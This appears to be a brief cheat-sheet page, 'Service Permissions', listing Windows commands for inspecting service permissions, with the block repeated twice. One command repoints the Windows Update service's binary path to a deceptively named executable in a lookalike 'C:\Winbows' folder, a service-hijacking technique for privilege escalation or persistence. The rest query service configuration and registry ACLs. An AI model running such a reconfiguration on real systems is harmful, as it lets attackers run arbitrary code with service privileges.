Service Permissions
April 05, 2024



sc config wuauserv binPath=C:\Winbows\Perfectlylegitprogram.exe
sc qc wuauserv

sc sdshow wuauserv

Get-ACL -Path HKLM:\System\CurrentControlSet\Services\wuauserv | Format-List

Last updated
April 05, 2024
sc config wuauserv binPath=C:\Winbows\Perfectlylegitprogram.exe
sc qc wuauserv
sc sdshow wuauserv
Get-ACL -Path HKLM:\System\CurrentControlSet\Services\wuauserv | Format-List
Last updated